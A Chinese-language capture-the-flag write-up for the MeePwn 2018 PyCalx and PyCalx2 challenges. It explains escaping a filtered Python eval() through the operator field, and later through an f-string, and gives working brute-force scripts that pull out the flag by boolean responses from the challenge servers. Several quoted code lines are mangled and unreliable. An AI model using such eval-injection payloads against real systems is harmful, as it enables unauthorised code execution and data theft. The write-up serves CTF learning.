PyCalx&PyCalx2-MeePwn-2018

\u70b9\u56fe\u6709\u5c0f\u60ca\u559c\u54e6~


PyCalx1

\u9898\u76ee\u4fe1\u606f

This code is supposed to be unexploitable :/ another pyjail?

Notice: The flag may contain non alphabetic characters (but still printable)

Please login to submit flag

\u8fdb\u53bb\u4e4b\u540e\u662f\u8fd9\u4e2a\u6837\u5b50\u7684


\u70b9\u51fbSource\u6211\u4eec\u53ef\u4ee5\u67e5\u770b\u8fd9\u4e2a\u7a0b\u5e8f\u7684\u6e90\u7801


\u4ee3\u7801\u8c03\u8bd5

\u4ed4\u7ec6\u9605\u8bfb\u4e86\u4e00\u4e0b\u4ee3\u7801\uff0c\u8fd9\u662f\u4e00\u4e2a\u6709\u9650\u5236\u7684Python\u8868\u8fbe\u5f0f\u8fd0\u7b97\u7684\u4e1c\u897f\u3002 \xa0

\u6d89\u53ca\u7684\u53d8\u91cf\u5305\u62ecsource\uff0cop\uff0cvalue1\uff0cvalue2\uff0cFLAG\u56db\u4e2a\u3002\xa0
-\xa0source\uff0c\u82e5\u503c\u4e3a1\u5219\u663e\u793a\u6e90\u4ee3\u7801\u3002\xa0
-\xa0value1\uff0c\u8fd0\u7b97\u7684\u7b2c\u4e00\u4e2a\u53d8\u91cf\u3002\xa0
-\xa0value2\uff0c\u8fd0\u7b97\u7684\u7b2c\u4e8c\u4e2a\u53d8\u91cf\u3002\xa0
-\xa0op\uff0c\u8fd0\u7b97\u7b26\u3002\xa0
-\xa0FLAG\uff0c\u8bfb\u53d6FLAG\uff0c\u5b58\u5728\u53d8\u91cf\u91cc\u9762\u3002


\u8fd9\u91cc\u8fd8\u901a\u8fc7\u4e24\u4e2a\u51fd\u6570\u5206\u522b\u5bf9\u8fd0\u7b97\u53d8\u91cf\u548c\u8fd0\u7b97\u7b26\u8fdb\u884c\u4e86\u9650\u5236\u3002

def get_value(val):

\xa0 \xa0val = str(val)[:64]

\xa0 \xa0if str(val).isdigit(): return int(val)

\xa0 \xa0blacklist = [\'(\', \')\', \'[\', \\', \'\\\'\', \'"\ \xa0# I don\'t like tuple, list and dict.

\xa0 \xa0if val == \'\' or [c for c in blacklist if c in val] != []:

\xa0 \xa0 \xa0 \xa0print(\'<center>Invalid value</center>\')

\xa0 \xa0 \xa0 \xa0sys.exit(0)

\xa0 \xa0return val

get_value()\u8fd9\u4e2a\u51fd\u6570\u9996\u5148\u662f\u9650\u5236\u53d8\u91cf\u7684\u6709\u6548\u957f\u5ea6\u4e3a64\uff0c\u7136\u540e\u8fd8\u901a\u8fc7\u9ed1\u540d\u5355(\uff0c)\uff0c[\uff0c]\uff0c\\\uff0c"\u9650\u5236\u53d8\u91cf\u5b57\u7b26\u3002

def get_op(val):

\xa0 \xa0val = str(val)[:2]

\xa0 \xa0list_ops = [\'+\', \'-\', \'/\', \'*\', \'=\', \'!\

\xa0 \xa0if val == \'\' or val[0] not in list_ops:

\xa0 \xa0 \xa0 \xa0print(\'<center>Invalid op</center>\')

\xa0 \xa0 \xa0 \xa0sys.exit(0)

\xa0 \xa0return val

get_op()\u8fd9\u4e2a\u51fd\u6570\u9996\u5148\u662f\u9650\u5236\u8fd0\u7b97\u7b26\u7684\u6709\u6548\u957f\u5ea6\u4e3a2\uff0c\u7136\u540e\u901a\u8fc7\u9ed1\u540d\u5355+\uff0c-\uff0c/\uff0c*\uff0c=\uff0c!\u9650\u5236\u4e86\u8fd0\u7b97\u7b26\u7684\u7b2c\u4e00\u4e2a\u5b57\u8282\uff0c\u7b2c\u4e8c\u4e2a\u5b57\u8282\u6ca1\u505a\u9650\u5236\u3002


\u901a\u8fc7\u4e0a\u9762\u7684\u51fd\u6570\u5bf9\u53d8\u91cf\u8fc7\u6ee4\u540e\uff0c\u8fd9\u91cc\u5c31\u662f\u5bf9\u8f93\u5165\u7684\u5185\u5bb9\u8f6c\u5316\u4e3a\u5b57\u7b26\u4e32\u62fc\u63a5\u6210\u4e3acalc_eval\u8868\u8fbe\u5f0f

calc_eval = str(repr(value1)) + str(op) + str(repr(value2))

......

......

try:

\xa0 \xa0result = str(eval(calc_eval))

\xa0 \xa0if result.isdigit() or result == \'True\' or result == \'False\':

\xa0 \xa0 \xa0 \xa0print(result)

\xa0 \xa0else:

\xa0 \xa0 \xa0 \xa0print("Invalid") \xa0# Sorry we don\'t support output as a string due to security issue.

except:

\xa0 \xa0print("Invalid")

\u6700\u540e\u901a\u8fc7eval()\u6267\u884ccalc_eval\u8868\u8fbe\u5f0f\uff0c\u8fd4\u56de\u7ed3\u679c\u8f6c\u5316\u4e3a\u5b57\u7b26\u4e32\xa0

\u5982\u679c\u5b57\u7b26\u4e32\u6ee1\u8db3\u6570\u5b57,True\uff0cFlase\u8fd9\u4e09\u79cd\u5f62\u5f0f\uff0c\u5c31\u5728\u9875\u9762\u8f93\u51fa\uff0c\u5426\u5219\u8f93\u51faInvalid\u9519\u8bef\u63d0\u793a


Bool\u56de\u663e\u578b\u6ce8\u5165

\u4e3a\u4e86\u4fbf\u4e8e\u5206\u6790\uff0c\u628a\u4ee3\u7801\u7cbe\u7b80\u6210\u672c\u5730\u8c03\u8bd5\uff0c\u4e3b\u8981\u662f\u8c03\u8bd5eval()\u4e2d\u7684\u8bed\u53e5\u3002

# coding=utf-8

import sys

if __name__ == "__main__":

\xa0 \xa0FLAG = open(\'index.php\', \'r\').read()

\xa0 \xa0def get_value(val):

\xa0 \xa0 \xa0 \xa0val = str(val)[:64]

\xa0 \xa0 \xa0 \xa0if str(val).isdigit(): return int(val)

\xa0 \xa0 \xa0 \xa0blacklist = [\'(\', \')\', \'[\', \\', \'\\\'\', \'"\ \xa0# I don\'t like tuple, list and dict.

\xa0 \xa0 \xa0 \xa0if val == \'\' or [c for c in blacklist if c in val] != []:

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0print(\'<center>Invalid value</center>\')

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0sys.exit(0)

\xa0 \xa0 \xa0 \xa0return val

\xa0 \xa0def get_op(val):

\xa0 \xa0 \xa0 \xa0val = str(val)[:2]

\xa0 \xa0 \xa0 \xa0list_ops = [\'+\', \'-\', \'/\', \'*\', \'=\', \'!\

\xa0 \xa0 \xa0 \xa0if val == \'\' or val[0] not in list_ops:

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0print(\'<center>Invalid op</center>\')

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0sys.exit(0)

\xa0 \xa0 \xa0 \xa0return val

\xa0 \xa0op = "+"

\xa0 \xa0value1 = "123"

\xa0 \xa0value2 = " 123"

\xa0 \xa0source = \'error_reporting\'

\xa0 \xa0op = get_op(op)

\xa0 \xa0value1 = get_value(value1)

\xa0 \xa0value2 = get_value(value2)

\xa0 \xa0calc_eval = str(repr(value1)) + str(op) + str(repr(value2))

\xa0 \xa0print calc_eval

\xa0 \xa0result = str(eval(calc_eval))

\xa0 \xa0print result


* * \u76ee\u6807\u6e05\u6670 \uff1a**Flag\u5df2\u7ecf\u5b58\u5728\u4e86\u53d8\u91cfFLAG\u91cc\u9762\uff0c\u7ed5\u8fc7\u8fc7\u6ee4\uff0c\u6ce8\u5165\u8868\u8fbe\u5f0f\u5230eval()\u91cc\u9762\uff0c\u6267\u884c\u4ee3\u7801\uff0c\u83b7\u53d6Flag\u3002

calc_eval = str(repr(value1)) + str(op) + str(repr(value2))


repr()\u8fd9\u4e2a\u51fd\u6570\u5f88\u5173\u952e\xa0

repr()\xa0\u51fd\u6570\u5c06\u5bf9\u8c61\u8f6c\u5316\u4e3a\u4f9b\u89e3\u91ca\u5668\u8bfb\u53d6\u7684\u5f62\u5f0f\uff0c\u5f53\u4f20\u5165\u4e0d\u662f\u6570\u5b57\u662f\u5b57\u7b26\u4e32\u7684\u65f6\u5019\uff0c\u4f1a\u5f15\u5165\u5f15\u53f7\'\uff0c\u6548\u679c\u5982\u4e0b\xa0

\u56e0\u4e3aget_value\u8fc7\u6ee4\u7684\u5b58\u5728\uff0c\u8fd9\u91cc\u65e0\u6cd5\u76f4\u63a5\u901a\u8fc7value1,value2\u5f15\u5165\u5355\u5f15\u53f7\u8fdb\u884c\u5355\u5f15\u53f7\u9003\u9038\u3002\xa0

\u4f46\u662f\u56e0\u4e3aget_op\u4ec5\u4ec5\u8fc7\u6ee4\u9a8c\u8bc1\u4e86\u7b2c\u4e00\u4f4d\u5b57\u7b26\uff0c\u56e0\u6b64\u6211\u4eec\u53ef\u4ee5\u5728\u7b2c\u4e8c\u4f4d\u5f15\u5165\u5355\u5f15\u53f7\u3002\xa0value1=a\uff0cvalue2=a\uff0cop=+\'

\' a \' + \' \' a \'

\u8fd9\u65f6\u5019\u8fdb\u5165eval\u80af\u5b9a\u4f1a\u56e0\u4e3a\u8bed\u6cd5\u62a5\u9519\uff0c\u8fd9\u65f6\u5019\u4fee\u6539value2=#a\uff0c\u6ce8\u91ca\u540e\u9762\u7684\u5355\u5f15\u53f7

\' a \' + \' \' #a \'

\u7b49\u4ef7\u4e8e

\' a \' + \' \'

\u90a3\u4e48\u540c\u65f6\u4e5f\u9003\u9038\u4e86\u5355\u5f15\u53f7\uff0c\u5728#\u53f7\u7684\u524d\u9762\u6211\u4eec\u5df2\u7ecf\u53ef\u4ee5\u6ce8\u5165\u5176\u4ed6\u8fd0\u7b97\u7b26\u4e86\xa0
value1=a\uff0cvalue2=and 1#a\uff0cop=+\'

a \' + \' \' \xa0and 1#a \'

\u7b49\u4ef7\u4e8e\uff0c\u5148\u52a0\u6cd5\u540e\u4e0e\u8fd0\u7b97

\' a \' + \' \' \xa0and 1

\u9003\u9038\u51fa\u4e86\u5355\u5f15\u53f7\uff0c\u4f46\u662f\u4ecd\u7136\u65e0\u6cd5\u76f4\u63a5\u6253\u5370\u51faFlag\uff0c\u56e0\u4e3a\u9875\u9762\u8fd4\u56de\u5fc5\u987b\u6ee1\u8db3\u6570\u5b57,True\uff0cFlase\u8fd9\u4e09\u79cd\u5f62\u5f0f\u624d\u6709\u56de\u663e\uff0c\u8fd9\u91cc\u53ef\u4ee5\u786e\u5b9a\u662f\u901a\u8fc7Bool\u8fd4\u56de\u503c\u5bf9Flag\u8fdb\u884c\u731c\u89e3\u3002

\u9996\u5148\u60f3\u5230\u7684\u662f\u8fd9\u79cd\u5f62\u5f0f\xa0value2=and ord(Flag[1]) ==100 #

\' a \' + \' \' and ord(Flag[1]) ==100 #\'

\u4f46\u8fc7\u6ee4\u7684\u51fd\u6570get_value\u5bfc\u81f4\u65e0\u6cd5\u8c03\u7528\u6709\u7528\u7684ord()\u51fd\u6570\uff0c\u540c\u6837\u65e0\u6cd5\u4f7f\u7528[index]\uff0c\u548c\u7c7b\u4f3c\u7684\u3002

\u8fd9\u65f6\u5019\u5c31\u8981\u7528\u5230\u524d\u9762\u7684source\u53d8\u91cf\u4e86

if \'source\' in arguments:

\xa0 \xa0source = arguments[\'source\.value

else:

\xa0 \xa0source = 0

if source == \'1\':

\xa0 \xa0print(\'<pre>\' + escape(str(open(__file__, \'r\').read())) + \'</pre>\')

source\u8d4b\u503c\u4f7f\u7528\u540e\u4ecd\u7136\u5b58\u5728\uff0c\u662f\u6211\u4eec\u7684\u53ef\u63a7\u70b9\uff0c\u4e14\u65e0\u8fc7\u6ee4\u51fd\u6570\uff0c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u5b83\u914d\u5408in\u8fdb\u884c\u731c\u89e3Flag\uff0c\u731c\u89e3\u6210\u529f\u9875\u9762\u8fd4\u56deTrue\uff0c\u9519\u8bef\u5219\u8fd4\u56deFlase\xa0
value1=a\uff0cvalue2=and True and source in FLAG#\uff0cop=+\'\uff0csource=xxx

\'a\' + \' \' and True and source in FLAG#\'


EXP

\u8fd9\u91cc\u6211\u4eec\u76f4\u63a5\u7f16\u5199\u811a\u672c\uff0c\u901a\u8fc7GET\u53c2\u6570source\u4fee\u6539\u66b4\u529b\u731c\u89e3FLAG

http://178.128.96.203/cgi-bin/server.py?value1=t&op=%2B%27&value2=+and+True+and+source+in+FLAG%23&source=MeePwnCTF%7Bpython3.66666666666666_%28%5B_%28%28you_passed_this%3F%5D%5D%5D%5D%5D%5D%29%7D


# coding=utf-8

import string

import requests

import sys

from urllib import quote

if __name__ == \'__main__\':

\xa0 \xa0reg_str = string.punctuation + string.ascii_lowercase + string.ascii_uppercase + string.digits

\xa0 \xa0Flag = "MeePwnCTF{"

\xa0 \xa0url = "http://178.128.96.203/cgi-bin/server.py?value1=t&op=%2B%27&value2=+and+True+and+source+in+FLAG%23&source=" + quote(

\xa0 \xa0 \xa0 \xa0Flag)

\xa0 \xa0for i in range(100):

\xa0 \xa0 \xa0 \xa0for x in reg_str:

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0url_t = url + quote(x)

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0print url_t

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0html = requests.get(url_t).content

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0if \'\'\'True

>>>\'\'\' in html:

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0url = url_t

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0Flag = Flag + x

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0print Flag

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0break

\u6700\u540eFlag\u4e3a

MeePwnCTF{python3.66666666666666_([_((you_passed_this?]]]]]])}


PyCalx2

\u9898\u76ee\u4fe1\u606f

You should solve PyCalx first.

\u5144\u5f1f\u9898\u76ee\uff0c\u548c\u4e0a\u4e00\u9898\u7684\u51e0\u4e4e\u6ca1\u505a\u6539\u52a8\uff0c\u53ea\u662f\u53c8\u589e\u52a0\u4e86\u5bf9op\u7684\u8fc7\u6ee4\uff0c\u5f15\u53f7\'\u5df2\u7ecf\u4e0d\u80fd\u4f7f\u7528\u4e86

op = get_op(get_value(arguments[\'op\.value))

\u6839\u636e\u4e0a\u4e00\u9898\u7684Flag\uff0c\u53ef\u4ee5\u77e5\u9053\u7248\u672c\u662fpython3.6\uff0c\u8fd9\u91cc\u9700\u8981\u4f7f\u7528F-strings.\xa0

\u5728python3.6.2\u7248\u672c\u4e2d\uff0cPEP 498 \u63d0\u51fa\u4e00\u79cd\u65b0\u578b\u5b57\u7b26\u4e32\u683c\u5f0f\u5316\u673a\u5236\uff0c\u88ab\u79f0\u4e3a\u201c\u5b57\u7b26\u4e32\u63d2\u503c\u201d\u6216\u8005\u66f4\u5e38\u89c1\u7684\u4e00\u79cd\u79f0\u547c\u662fF-strings\xa0

F-strings\u63d0\u4f9b\u4e86\u4e00\u79cd\u660e\u786e\u4e14\u65b9\u4fbf\u7684\u65b9\u5f0f\u5c06python\u8868\u8fbe\u5f0f\u5d4c\u5165\u5230\u5b57\u7b26\u4e32\u4e2d\u6765\u8fdb\u884c\u683c\u5f0f\u5316\u3002

\u4f7f\u7528F-strings\u6211\u4eec\u4e0d\u7528\u9003\u9038\u5355\u5f15\u53f7\uff0c\u56e0\u4e3a\u5b83\u652f\u6301\u8868\u8fbe\u5f0f\u3002 \xa0

\u9996\u5148\u60f3\u5230\u7684\u4e09\u5143\u8868\u8fbe\u5f0f\uff0c\u4f46\u662fPython\u4e2d\u5e76\u6ca1\u6709\uff0cemm........\uff0c\u4f7f\u7528\u540c\u529f\u80fd\u7684if else\xa0

value1 = True\uff0cvalue2\xa0={source*0 if source in FLAG else 233}\xa0\uff0cop\xa0=\xa0+f\xa0

\u6267\u884c\u7684\u4ee3\u7801\u4e3a\uff1a\xa0

\'True\'+f\'{source*0 if source in FLAG else 233}\'

\u5982\u679c\u5339\u914d\u6210\u529f\u8fd4\u56deTrue\uff0c\u5339\u914d\u5931\u8d25\u8fd4\u56deTrue233



EXP

\u76f4\u63a5\u4fee\u6539\u524d\u4e00\u4e2a\u9898\u7684\u811a\u672c

# coding=utf-8

import string

import requests

import sys

from urllib import quote

if __name__ == \'__main__\':

\xa0 \xa0reg_str = string.punctuation + string.ascii_lowercase + string.ascii_uppercase + string.digits

\xa0 \xa0Flag = "MeePwnCTF{"

\xa0 \xa0url = "http://206.189.223.3/cgi-bin/server.py?value1=True&op=%2Bf&value2=%7Bsource*0+if+source+in+FLAG+else+233%7D&source=" + quote(

\xa0 \xa0 \xa0 \xa0Flag)

\xa0 \xa0for i in range(100):

\xa0 \xa0 \xa0 \xa0for x in reg_str:

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0url_t = url + quote(x)

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0print url_t

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0html = requests.get(url_t).content

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0if \'\'\'True

>>>\'\'\' in html:

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0url = url_t

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0Flag = Flag + x

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0print Flag

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0break

Flag\uff1aMeePwnCTF{python3.6[_strikes_backkkkkkkkkkkk)}


\u2199\u2199\u2199 \u70b9\u51fb \u201d\u9605\u8bfb\u539f\u6587\u201c \u4e0e\u4f5c\u8005\u5c55\u5f00\u8bdd\u9898\u63a2\u8ba8,\u76f4\u9762\u4ea4\u6d41